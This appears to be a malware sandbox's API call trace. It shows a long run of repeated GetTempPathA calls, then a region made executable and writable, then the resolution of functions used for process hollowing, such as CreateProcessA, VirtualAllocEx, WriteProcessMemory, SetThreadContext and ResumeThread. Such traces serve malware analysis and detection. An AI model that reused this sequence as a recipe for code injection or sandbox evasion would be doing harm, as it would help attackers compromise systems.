GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.473] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.474] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.475] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.476] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.724] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.725] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.908] VirtualProtect (in: lpAddress=0x1b35b0, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0099.909] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0099.909] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0099.910] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0099.910] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0099.910] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0099.911] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0099.911] 
